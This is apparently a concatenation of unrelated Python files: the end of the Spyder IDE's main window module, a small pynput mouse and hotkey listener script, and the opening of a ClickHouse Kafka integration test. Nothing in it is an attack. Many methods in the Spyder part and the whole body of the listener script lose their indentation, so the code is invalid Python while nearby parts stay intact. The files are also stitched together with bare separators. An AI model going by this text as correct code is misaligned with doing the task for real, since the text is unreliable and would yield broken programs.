           qt_api_name=versions['qt_api'],
           qt_api_version=versions['qt_api_ver'],
           os_name=versions['system'],
           os_version=versions['release'],
           dependencies=dependencies.status())
        return issue_template
    @Slot()
    def report_issue(self, body=None, title=None, open_webpage=False):
        """Report a Spyder issue to github, generating body text if needed."""
        if body is None:
            # No prefilled body: show the interactive error-report dialog
            from spyder.widgets.reporterror import SpyderErrorDialog
            report_dlg = SpyderErrorDialog(self, is_report=True)
            report_dlg.show()
        else:
            if open_webpage:
                # URL-quote the body/title before embedding them in the
                # "new issue" URL query
                if PY3:
                    from urllib.parse import quote
                else:
                    from urllib import quote     # analysis:ignore
                from qtpy.QtCore import QUrlQuery
                url = QUrl(__project_url__ + '/issues/new')
                query = QUrlQuery()
                query.addQueryItem("body", quote(body))
                if title:
                    query.addQueryItem("title", quote(title))
                url.setQuery(query)
                QDesktopServices.openUrl(url)
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
    @Slot()
    def global_callback(self):
        """Global callback.

        Invoke, on the focused (or previously focused) text widget, the
        method whose name is stored in the triggering action's data.
        """
        widget = QApplication.focusWidget()
        action = self.sender()
        # The method name to call is carried in the action's data payload
        callback = from_qvariant(action.data(), to_text_string)
        from spyder.widgets.editor import TextEditBaseWidget
        # If focused widget isn't valid try the last focused
        if not isinstance(widget, TextEditBaseWidget):
            widget = self.previous_focused_widget
        if isinstance(widget, TextEditBaseWidget):
            getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
    def open_external_console(self, fname, wdir, args, interact, debug, python,
                              python_args, systerm, post_mortem=False):
        """Open external console.

        When *systerm* is True, run *fname* in an external system
        terminal using either the default or the configured interpreter.
        NOTE(review): the `python` and `post_mortem` parameters are
        unused in this body — presumably kept for signature
        compatibility with callers.
        """
        if systerm:
            # Running script in an external system terminal
            try:
                if CONF.get('main_interpreter', 'default'):
                    executable = get_python_executable()
                else:
                    executable = CONF.get('main_interpreter', 'executable')
                programs.run_python_script_in_terminal(
                        fname, wdir, args, interact, debug, python_args,
                        executable)
            except NotImplementedError:
                QMessageBox.critical(self, _("Run"),
                                     _("Running an external system terminal "
                                       "is not supported on platform %s."
                                       ) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
    def open_file(self, fname, external=False):
        """
        Open filename with the appropriate application
        Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
        or open file outside Spyder (if extension is not supported)
        """
        fname = to_text_string(fname)
        ext = osp.splitext(fname)[1]
        if encoding.is_text_file(fname):
            self.editor.load(fname)
        elif self.variableexplorer is not None and ext in IMPORT_EXT:
            self.variableexplorer.import_data(fname)
        elif not external:
            # Unsupported extension: delegate to the OS default handler,
            # unless the request already came from outside Spyder
            fname = file_uri(fname)
            programs.start_file(fname)
    def open_external_file(self, fname):
        """
        Open external files that can be handled either by the Editor or the
        variable explorer inside Spyder.
        """
        fname = encoding.to_unicode_from_fs(fname)
        if osp.isfile(fname):
            self.open_file(fname, external=True)
        elif osp.isfile(osp.join(CWD, fname)):
            # Relative path: resolve against the startup working directory
            self.open_file(osp.join(CWD, fname), external=True)
# ---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
    """Return Spyder PYTHONPATH"""
    # User paths minus the deactivated ones, then project paths.
    active = [entry for entry in self.path
              if entry not in self.not_active_path]
    return active + self.project_path
def add_path_to_sys_path(self):
    """Add Spyder path to sys.path"""
    # Inserting in reverse at index 1 preserves the configured order
    # while keeping sys.path[0] (the script dir) first.
    for entry in reversed(self.get_spyder_pythonpath()):
        sys.path.insert(1, entry)
def remove_path_from_sys_path(self):
    """Remove Spyder path from sys.path"""
    for entry in self.path + self.project_path:
        # A path may have been inserted more than once; drop them all.
        while entry in sys.path:
            sys.path.remove(entry)
@Slot()
def path_manager_callback(self):
    """Spyder path manager"""
    from spyder.widgets.pathmanager import PathManager
    self.remove_path_from_sys_path()
    project_path = self.projects.get_pythonpath()
    dialog = PathManager(self, self.path, project_path,
                         self.not_active_path, sync=True)
    dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
    dialog.exec_()
    self.add_path_to_sys_path()
    try:
        # Persist both the active and the deactivated path lists.
        encoding.writelines(self.path, self.SPYDER_PATH)
        encoding.writelines(self.not_active_path,
                            self.SPYDER_NOT_ACTIVE_PATH)
    except EnvironmentError:
        # Best effort: a read-only config dir must not break the dialog.
        pass
    self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
    """Projects PYTHONPATH contribution has changed"""
    self.remove_path_from_sys_path()
    self.project_path = self.projects.get_pythonpath()
    self.add_path_to_sys_path()
    self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
    """Show Windows current user environment variables"""
    dialog = WinUserEnvDialog(self)
    self.dialog_manager.show(dialog)
#---- Preferences
def apply_settings(self):
    """Apply settings changed in 'Preferences' dialog box"""
    qapp = QApplication.instance()

    # Set 'gtk+' as the default theme in Gtk-based desktops
    # Fixes Issue 2036
    if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
        try:
            qapp.setStyle('gtk+')
        except Exception:
            # Best effort only. Fix: the original bare `except:` also
            # swallowed SystemExit/KeyboardInterrupt.
            pass
    else:
        style_name = CONF.get('main', 'windows_style',
                              self.default_style)
        style = QStyleFactory.create(style_name)
        if style is not None:
            style.setProperty('name', style_name)
            qapp.setStyle(style)

    # Rebuild dock options from the configured flags.
    default = self.DOCKOPTIONS
    if CONF.get('main', 'vertical_tabs'):
        default = default | QMainWindow.VerticalTabs
    if CONF.get('main', 'animated_docks'):
        default = default | QMainWindow.AnimatedDocks
    self.setDockOptions(default)

    self.apply_panes_settings()
    self.apply_statusbar_settings()

    # Cursor blinking: custom interval or the OS default.
    if CONF.get('main', 'use_custom_cursor_blinking'):
        qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
    else:
        qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
    """Update dockwidgets features settings"""
    vertical_titles = CONF.get('main', 'vertical_dockwidget_titlebars')
    for child in self.widgetlist:
        features = child.FEATURES
        if vertical_titles:
            features |= QDockWidget.DockWidgetVerticalTitleBar
        if not self.dockwidgets_locked:
            features |= QDockWidget.DockWidgetMovable
        child.dockwidget.setFeatures(features)
        child.update_margins()
def apply_statusbar_settings(self):
    """Update status bar widgets settings"""
    show_status_bar = CONF.get('main', 'show_status_bar')
    self.statusBar().setVisible(show_status_bar)
    if not show_status_bar:
        return
    for widget, name in ((self.mem_status, 'memory_usage'),
                         (self.cpu_status, 'cpu_usage')):
        if widget is not None:
            widget.setVisible(CONF.get('main', '%s/enable' % name))
            widget.set_interval(CONF.get('main', '%s/timeout' % name))
@Slot()
def edit_preferences(self):
    """Edit Spyder preferences"""
    from spyder.plugins.configdialog import ConfigDialog
    dlg = ConfigDialog(self)
    dlg.size_change.connect(self.set_prefs_size)
    if self.prefs_dialog_size is not None:
        dlg.resize(self.prefs_dialog_size)
    # General (non-plugin) preference pages.
    for PrefPageClass in self.general_prefs:
        page = PrefPageClass(dlg, main=self)
        page.initialize()
        dlg.add_page(page)
    # Per-plugin preference pages; disabled plugins are None.
    builtin_plugins = [self.workingdirectory, self.editor,
                       self.projects, self.ipyconsole,
                       self.historylog, self.help, self.variableexplorer,
                       self.onlinehelp, self.explorer, self.findinfiles]
    for plugin in builtin_plugins + self.thirdparty_plugins:
        if plugin is not None:
            try:
                page = plugin.create_configwidget(dlg)
                if page is not None:
                    dlg.add_page(page)
            except Exception:
                # A broken (third-party) plugin must not block the dialog.
                traceback.print_exc(file=sys.stderr)
    if self.prefs_index is not None:
        dlg.set_current_index(self.prefs_index)
    dlg.show()
    dlg.check_all_settings()
    dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
    dlg.exec_()
def __preference_page_changed(self, index):
    """Remember the last visited preference page index."""
    self.prefs_index = index
def set_prefs_size(self, size):
    """Save preferences dialog size"""
    self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
                      add_sc_to_tip=False):
    """
    Register QAction or QShortcut to Spyder main application,
    with shortcut (context, name, default)
    """
    entry = (qaction_or_qshortcut, context, name, add_sc_to_tip)
    self.shortcut_data.append(entry)
def apply_shortcuts(self):
    """Apply shortcuts settings to all widgets/plugins"""
    dead_entries = []
    for index, (qobject, context, name,
                add_sc_to_tip) in enumerate(self.shortcut_data):
        keyseq = QKeySequence(get_shortcut(context, name))
        try:
            if isinstance(qobject, QAction):
                if (sys.platform == 'darwin'
                        and qobject._shown_shortcut == 'missing'):
                    qobject._shown_shortcut = keyseq
                else:
                    qobject.setShortcut(keyseq)
                if add_sc_to_tip:
                    add_shortcut_to_tooltip(qobject, context, name)
            elif isinstance(qobject, QShortcut):
                qobject.setKey(keyseq)
        except RuntimeError:
            # The underlying C++ object has been deleted.
            dead_entries.append(index)
    # Pop from the end so earlier indexes remain valid.
    for index in sorted(dead_entries, reverse=True):
        self.shortcut_data.pop(index)
@Slot()
def show_shortcuts_dialog(self):
    """Show a summary dialog of all configured shortcuts."""
    from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog
    dlg = ShortcutsSummaryDialog(None)
    dlg.exec_()
# -- Open files server
def start_open_files_server(self):
    """Serve file-open requests from other Spyder instances on a
    loopback socket; runs until the socket is closed."""
    self.open_files_server.setsockopt(socket.SOL_SOCKET,
                                      socket.SO_REUSEADDR, 1)
    port = select_port(default_port=OPEN_FILES_PORT)
    CONF.set('main', 'open_files_port', port)
    self.open_files_server.bind(('127.0.0.1', port))
    self.open_files_server.listen(20)
    while True:
        try:
            req, dummy = self.open_files_server.accept()
        except socket.error as e:
            # See Issue 1275 for details on why errno EINTR is
            # silently ignored here.
            eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
            # To avoid a traceback after closing on Windows
            if e.args[0] == eintr:
                continue
            # handle a connection abort on close error
            enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
                        else errno.ENOTSOCK)
            if e.args[0] in [errno.ECONNABORTED, enotsock]:
                return
            raise
        fname = req.recv(1024).decode('utf-8')
        self.sig_open_external_file.emit(fname)
        req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
    """
    Quit and reset Spyder and then Restart application.
    """
    answer = QMessageBox.warning(
        self, _("Warning"),
        _("Spyder will restart and reset to default settings: <br><br>"
          "Do you want to continue?"),
        QMessageBox.Yes | QMessageBox.No)
    if answer == QMessageBox.Yes:
        self.restart(reset=True)
@Slot()
def restart(self, reset=False):
    """
    Quit and Restart Spyder application.

    If reset True it allows to reset spyder on restart.
    """
    # Helper script that performs the actual restart.
    spyder_start_directory = get_module_path('spyder')
    restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')

    # Recover the arguments Spyder was launched with.
    # Note: Variables defined in bootstrap.py and spyder/app/start.py
    env = os.environ.copy()
    bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
    spyder_args = env.pop('SPYDER_ARGS')

    # Current process and python running spyder
    pid = os.getpid()
    python = sys.executable

    # Check if started with bootstrap.py
    is_bootstrap = bootstrap_args is not None
    if is_bootstrap:
        spyder_args = bootstrap_args

    # Pass variables as environment variables (str) to restarter subprocess
    env['SPYDER_ARGS'] = spyder_args
    env['SPYDER_PID'] = str(pid)
    env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
    env['SPYDER_RESET'] = str(reset)

    if DEV:
        sep = ';' if os.name == 'nt' else ':'
        env['PYTHONPATH'] = sep.join(sys.path)

    # Build the command and popen arguments depending on the OS
    if os.name == 'nt':
        # Hide flashing command prompt
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        shell = False
    else:
        startupinfo = None
        shell = True

    command = '"{0}" "{1}"'.format(python, restart_script)
    try:
        if self.closing(True):
            subprocess.Popen(command, shell=shell, env=env,
                             startupinfo=startupinfo)
            self.console.quit()
    except Exception as error:
        # If there is an error with subprocess, Spyder should not quit and
        # the error can be inspected in the internal console
        print(error)  # spyder: test-skip
        print(command)  # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
    """Start the interactive tour stored at *index*."""
    frames = self.tours_available[index]
    self.tour.set_tour(index, frames, self)
    self.tour.start_tour()
# ---- Global File Switcher
def open_fileswitcher(self, symbol=False):
    """Open file list management dialog box.

    Toggles the switcher: hides it when already visible, otherwise shows
    it (in symbol-search mode when *symbol* is True).
    """
    # Fix: nothing to do before a switcher has been registered through
    # add_to_fileswitcher -- the original raised AttributeError here.
    if self.fileswitcher is None:
        return
    if self.fileswitcher.is_visible:
        self.fileswitcher.hide()
        self.fileswitcher.is_visible = False
        return
    if symbol:
        # The '@' prefix puts the switcher in symbol-search mode.
        self.fileswitcher.plugin = self.editor
        self.fileswitcher.set_search_text('@')
    else:
        self.fileswitcher.set_search_text('')
    self.fileswitcher.show()
    self.fileswitcher.is_visible = True
def open_symbolfinder(self):
    """Open symbol list management dialog box."""
    self.open_fileswitcher(symbol=True)
def add_to_fileswitcher(self, plugin, tabs, data, icon):
    """Add a plugin to the File Switcher."""
    if self.fileswitcher is None:
        # First registration creates the switcher itself.
        self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon)
    else:
        self.fileswitcher.add_plugin(plugin, tabs, data, icon)
    tab_manager = plugin.get_current_tab_manager()
    self.fileswitcher.sig_goto_file.connect(tab_manager.set_stack_index)
# ---- Check for Spyder Updates
def _check_updates_ready(self):
    """Called by WorkerUpdates when ready"""
    from spyder.widgets.helperwidgets import MessageCheckBox

    # On startup only positive feedback is given; after startup (menu
    # action) feedback is given whether updates are found or not.
    feedback = self.give_updates_feedback

    # Get results from worker
    update_available = self.worker_updates.update_available
    latest_release = self.worker_updates.latest_release
    error_msg = self.worker_updates.error

    url_r = __project_url__ + '/releases'
    url_i = 'https://docs.spyder-ide.org/installation.html'

    # Define the custom QMessageBox
    box = MessageCheckBox(icon=QMessageBox.Information, parent=self)
    box.setWindowTitle(_("Spyder updates"))
    box.set_checkbox_text(_("Check for updates on startup"))
    box.setStandardButtons(QMessageBox.Ok)
    box.setDefaultButton(QMessageBox.Ok)

    # Adjust the checkbox depending on the stored configuration
    section, option = 'main', 'check_updates_on_startup'
    check_updates = CONF.get(section, option)
    box.set_checked(check_updates)

    if error_msg is not None:
        box.setText(error_msg)
        box.set_check_visible(False)
        box.exec_()
        check_updates = box.is_checked()
    elif update_available:
        anaconda_msg = ''
        if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
            anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
                             "that you are using Spyder with "
                             "<b>Anaconda/Miniconda</b>. Please "
                             "<b>don't</b> use <code>pip</code> to "
                             "update it as that will probably break "
                             "your installation.<br><br>"
                             "Instead, please wait until new conda "
                             "packages are available and use "
                             "<code>conda</code> to perform the "
                             "update.<hr>")
        msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
                "your package manager to update Spyder or go to our "
                "<a href=\"%s\">Releases</a> page to download this "
                "new version. <br><br>If you are not sure how to "
                "proceed to update Spyder please refer to our "
                " <a href=\"%s\">Installation</a> instructions."
                "") % (latest_release, url_r, url_i)
        msg += '<br>' + anaconda_msg
        box.setText(msg)
        box.set_check_visible(True)
        box.exec_()
        check_updates = box.is_checked()
    elif feedback:
        box.setText(_("Spyder is up to date."))
        box.set_check_visible(False)
        box.exec_()
        check_updates = box.is_checked()

    # Update checkbox based on user interaction
    CONF.set(section, option, check_updates)

    # Enable check_updates_action after the thread has finished
    self.check_updates_action.setDisabled(False)

    # Provide feedback when clicking menu if check on startup is on
    self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
    """
    Check for spyder updates on github releases using a QThread.
    """
    from spyder.workers.updates import WorkerUpdates

    # Disable check_updates_action while the thread is working
    self.check_updates_action.setDisabled(True)

    if self.thread_updates is not None:
        self.thread_updates.terminate()

    self.thread_updates = QThread(self)
    self.worker_updates = WorkerUpdates(self, startup=startup)
    self.worker_updates.sig_ready.connect(self._check_updates_ready)
    self.worker_updates.sig_ready.connect(self.thread_updates.quit)
    self.worker_updates.moveToThread(self.thread_updates)
    self.thread_updates.started.connect(self.worker_updates.start)
    self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
    """Initialize Qt, patching sys.exit and eventually setting up ETS"""
    # This doesn't create our QApplication, just holds a reference to
    # MAIN_APP, created above to show our splash screen as early as
    # possible
    app = qapplication()

    # --- Set application icon
    app.setWindowIcon(APP_ICON)

    # ---- Monkey patching QApplication
    class FakeQApplication(QApplication):
        """Spyder's fake QApplication"""
        def __init__(self, args):
            self = app  # analysis:ignore

        @staticmethod
        def exec_():
            """Do nothing because the Qt mainloop is already running"""
            pass

    from qtpy import QtWidgets
    QtWidgets.QApplication = FakeQApplication

    # ---- Monkey patching sys.exit
    def fake_sys_exit(arg=None):
        # Fix: the original used a mutable default (`arg=[]`), a Python
        # anti-pattern even though the argument is ignored here.
        pass
    sys.exit = fake_sys_exit

    # ---- Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
    if PYQT5:
        def spy_excepthook(type_, value, tback):
            sys.__excepthook__(type_, value, tback)
        sys.excepthook = spy_excepthook

    # Removing arguments from sys.argv as in standard Python interpreter
    sys.argv = ['']

    # Selecting Qt4 backend for Enthought Tool Suite (if installed)
    try:
        from enthought.etsconfig.api import ETSConfig
        ETSConfig.toolkit = 'qt4'
    except ImportError:
        pass

    return app
class Spy(object):
    """
    Inspect Spyder internals

    Attributes:
        app       Reference to main QApplication object
        window    Reference to spyder.MainWindow widget
    """

    def __init__(self, app, window):
        self.app = app
        self.window = window

    def __dir__(self):
        # Instance attributes plus the public API of the class.
        public = [name for name in dir(self.__class__)
                  if not name.startswith('_')]
        return list(self.__dict__.keys()) + public

    def versions(self):
        return get_versions()
def run_spyder(app, options, args):
    """
    Create and show Spyder's main window
    Start QApplication event loop
    """
    # Main window
    main = MainWindow(options)
    try:
        main.setup()
    except BaseException:
        # Let the internal console die gracefully, then re-raise.
        if main.console is not None:
            try:
                main.console.shell.exit_interpreter()
            except BaseException:
                pass
        raise
    main.show()
    main.post_visible_setup()

    if main.console:
        # Expose a `spy` helper inside the internal console.
        main.console.shell.interpreter.namespace['spy'] = \
            Spy(app=app, window=main)

    # Open external files passed as args
    if args:
        for a in args:
            main.open_external_file(a)

    # Don't show icons in menus for Mac
    if sys.platform == 'darwin':
        QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)

    # Open external files with our Mac app
    if running_in_mac_app():
        app.sig_open_external_file.connect(main.open_external_file)

    # To give focus again to the last focused widget after restoring
    # the window
    app.focusChanged.connect(main.change_last_focused_widget)

    if not running_under_pytest():
        app.exec_()
    return main
#==============================================================================
# Main
#==============================================================================
def main():
    """Main function"""
    # Under pytest, build a minimal fake options object and return the
    # window instead of entering the event loop.
    if running_under_pytest():
        try:
            from unittest.mock import Mock
        except ImportError:
            from mock import Mock  # Python 2
        options = Mock()
        options.working_directory = None
        options.profile = False
        options.multithreaded = False
        options.new_instance = False
        options.open_project = None
        options.window_title = None
        app = initialize()
        window = run_spyder(app, options, None)
        return window

    # **** Collect command line options ****
    # Note regarding Options:
    # It's important to collect options before monkey patching sys.exit,
    # otherwise, argparse won't be able to exit if --help option is passed
    options, args = get_options()

    if options.show_console:
        print("(Deprecated) --show console does nothing, now the default "
              " behavior is to show the console, use --hide-console if you "
              "want to hide it")

    if set_attached_console_visible is not None:
        set_attached_console_visible(not options.hide_console
                                     or options.reset_config_files
                                     or options.reset_to_defaults
                                     or options.optimize or bool(DEBUG))

    app = initialize()
    if options.reset_config_files:
        # <!> Remove all configuration files!
        reset_config_files()
        return
    elif options.reset_to_defaults:
        # Reset Spyder settings to defaults
        CONF.reset_to_defaults(save=True)
        return
    elif options.optimize:
        # Optimize the whole Spyder's source code directory
        import spyder
        programs.run_python_script(module="compileall",
                                   args=[spyder.__path__[0]], p_args=['-O'])
        return

    # Show crash dialog
    if CONF.get('main', 'crash', False) and not DEV:
        CONF.set('main', 'crash', False)
        if SPLASH is not None:
            SPLASH.hide()
        QMessageBox.information(
            None, "Spyder",
            "Spyder crashed during last session.<br><br>"
            "If Spyder does not start at all and <u>before submitting a "
            "bug report</u>, please try to reset settings to defaults by "
            "running Spyder with the command line option '--reset':<br>"
            "<span style=\'color: #555555\'><b>spyder --reset</b></span>"
            "<br><br>"
            "<span style=\'color: #ff5555\'><b>Warning:</b></span> "
            "this command will remove all your Spyder configuration files "
            "located in '%s').<br><br>"
            "If Spyder still fails to launch, you should consult our "
            "comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, "
            "which when followed carefully solves the vast majority of "
            "crashes; also, take "
            "the time to search for <a href=\"%s\">known bugs</a> or "
            "<a href=\"%s\">discussions</a> matching your situation before "
            "submitting a report to our <a href=\"%s\">issue tracker</a>. "
            "Your feedback will always be greatly appreciated."
            "" % (get_conf_path(), __trouble_url__, __project_url__,
                  __forum_url__, __project_url__))

    # Create main window
    mainwindow = None
    try:
        mainwindow = run_spyder(app, options, args)
    except FontError:
        QMessageBox.information(
            None, "Spyder",
            "Spyder was unable to load the <i>Spyder 3</i> "
            "icon theme. That's why it's going to fallback to the "
            "theme used in Spyder 2.<br><br>"
            "For that, please close this window and start Spyder again.")
        CONF.set('main', 'icon_theme', 'spyder 2')
    except BaseException:
        CONF.set('main', 'crash', True)
        import traceback
        traceback.print_exc(file=STDERR)
        # Fix: write the crash log through a context manager so the file
        # handle is flushed and closed (the original leaked it).
        with open('spyder_crash.log', 'w') as crash_log:
            traceback.print_exc(file=crash_log)
    if mainwindow is None:
        # An exception occured
        if SPLASH is not None:
            SPLASH.hide()
        return

    ORIGINAL_SYS_EXIT()
# Script entry point.
if __name__ == "__main__":
    main()
|
picker.py | import threading
from pynput import keyboard
from pynput import mouse
"""
monitor the mouse: x, y
paint the x, y, w, h box with red color
monitor the ctrl-keyboard
generate the position index value
"""
def on_move(x, y):
# print('Pointer moved to {0}'.format(
# (x, y)))
pass
def on_activate_h():
print('on_activate_h')
def monitoring_mouse():
with mouse.Listener(
on_move=on_move) as listener:
listener.join()
mouse.Listener(
on_move=on_move).start()
def monitoring_keyboard():
with keyboard.GlobalHotKeys({'<ctrl>': on_activate_h}) as h:
h.join()
threading.Thread(target=monitoring_mouse).start()
threading.Thread(target=monitoring_keyboard).start()
print("monitoring the mouse and keyboard")
|
test.py | import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import ast
import math
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
from . import message_with_repeated_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)

# Single ClickHouse instance wired to Kafka and ZooKeeper; the macros
# below are referenced from the table DDL in the tests.
instance = cluster.add_instance(
    'instance',
    main_configs=['configs/kafka.xml', 'configs/named_collection.xml'],
    user_configs=['configs/users.xml'],
    with_kafka=True,
    with_zookeeper=True,  # For Replicated Table
    macros={"kafka_broker": "kafka1",
            "kafka_topic_old": "old",
            "kafka_group_name_old": "old",
            "kafka_topic_new": "new",
            "kafka_group_name_new": "new",
            "kafka_client_id": "instance",
            "kafka_format_json_each_row": "JSONEachRow"},
    clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
    """Connect a KafkaProducer to localhost:<port>, retrying on failure."""
    errors = []
    for _ in range(retries):
        try:
            producer = KafkaProducer(
                bootstrap_servers="localhost:{}".format(port),
                value_serializer=serializer)
            logging.debug("Kafka Connection establised: localhost:{}".format(port))
            return producer
        except Exception as e:
            errors.append(str(e))
            time.sleep(1)
    raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
    """Encode str payloads to bytes; pass anything else through as-is."""
    if isinstance(x, str):
        return x.encode()
    return x
def kafka_create_topic(admin_client, topic_name, num_partitions=1, replication_factor=1, max_retries=50, config=None):
    """Create a Kafka topic, retrying up to *max_retries* times."""
    logging.debug(f"Kafka create topic={topic_name}, num_partitions={num_partitions}, replication_factor={replication_factor}")
    new_topics = [NewTopic(name=topic_name,
                           num_partitions=num_partitions,
                           replication_factor=replication_factor,
                           topic_configs=config)]
    attempts = 0
    while True:
        try:
            admin_client.create_topics(new_topics=new_topics, validate_only=False)
            logging.debug("Admin client succeed")
            return
        except Exception as e:
            attempts += 1
            time.sleep(0.5)
            if attempts < max_retries:
                logging.warning(f"Failed to create topic {e}")
            else:
                raise
def kafka_delete_topic(admin_client, topic, max_retries=50):
    """Delete *topic* and poll until it disappears from the broker."""
    result = admin_client.delete_topics([topic])
    for (topic, e) in result.topic_error_codes:
        if e == 0:
            logging.debug(f"Topic {topic} deleted")
        else:
            logging.error(f"Failed to delete topic {topic}: {e}")

    attempts = 0
    while True:
        topics_listed = admin_client.list_topics()
        logging.debug(f"TOPICS LISTED: {topics_listed}")
        if topic not in topics_listed:
            return
        attempts += 1
        time.sleep(0.5)
        if attempts > max_retries:
            raise Exception(f"Failed to delete topics {topic}, {result}")
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
    """Send *messages* to *topic* through a freshly connected producer."""
    logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
    producer = get_kafka_producer(kafka_cluster.kafka_port,
                                  producer_serializer, retries)
    for message in messages:
        producer.send(topic=topic, value=message, timestamp_ms=timestamp)
    producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50, kafka_cluster=None):
    """Send a throw-away message to verify the producer works.

    Fix: the original body referenced an undefined name ``kafka_cluster``
    and raised NameError when called; default to the module-level
    ``cluster`` while allowing an explicit cluster to be passed.
    """
    kafka_produce(kafka_cluster or cluster, 'test_heartbeat_topic', ['test'],
                  retries=max_retries)
def kafka_consume(kafka_cluster, topic, needDecode=True, timestamp=0):
    """Yield messages from *topic*, optionally decoded as UTF-8.

    Fix: ``subscribe(topics=(topic))`` passed a bare string -- parentheses
    without a comma do not make a tuple; kafka-python expects a list or
    tuple of topic names.
    """
    consumer = KafkaConsumer(
        bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port),
        auto_offset_reset="earliest")
    consumer.subscribe(topics=[topic])
    for toppar, messages in list(consumer.poll(5000).items()):
        if toppar.topic == topic:
            for message in messages:
                # Kafka timestamps are in milliseconds.
                assert timestamp == 0 or message.timestamp / 1000 == timestamp
                if needDecode:
                    yield message.value.decode()
                else:
                    yield message.value
    consumer.unsubscribe()
    consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
    """Produce varint-delimited KeyValuePair protobufs as one Kafka message."""
    payload = b''
    for i in range(start_index, start_index + num_messages):
        msg = kafka_pb2.KeyValuePair()
        msg.key = i
        msg.value = str(i)
        serialized = msg.SerializeToString()
        # Each record is prefixed by its varint-encoded length.
        payload += _VarintBytes(len(serialized)) + serialized
    producer = KafkaProducer(
        bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port),
        value_serializer=producer_serializer)
    producer.send(topic=topic, value=payload)
    producer.flush()
    logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
    """Produce each KeyValuePair protobuf as its own Kafka message,
    without varint length delimiters.

    Fix: removed the unused ``data = ''`` accumulator left over from the
    delimited variant. (The name keeps its historical misspelling for
    caller compatibility.)
    """
    producer = KafkaProducer(
        bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    for i in range(start_index, start_index + num_messages):
        msg = kafka_pb2.KeyValuePair()
        msg.key = i
        msg.value = str(i)
        serialized_msg = msg.SerializeToString()
        producer.send(topic=topic, value=serialized_msg)
    producer.flush()
    logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster, topic, start_index, num_messages):
    """Produce varint-delimited social_pb2.User protobufs as one message."""
    payload = b''
    for i in range(start_index, start_index + num_messages):
        msg = social_pb2.User()
        msg.username = 'John Doe {}'.format(i)
        msg.timestamp = 1000000 + i
        serialized = msg.SerializeToString()
        payload += _VarintBytes(len(serialized)) + serialized
    producer = KafkaProducer(
        bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port),
        value_serializer=producer_serializer)
    producer.send(topic=topic, value=payload)
    producer.flush()
    logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
    """Serialize *value* (a dict, or list of dicts) to Avro container bytes."""
    schema = avro.schema.make_avsc_object({
        'name': 'row',
        'type': 'record',
        'fields': [
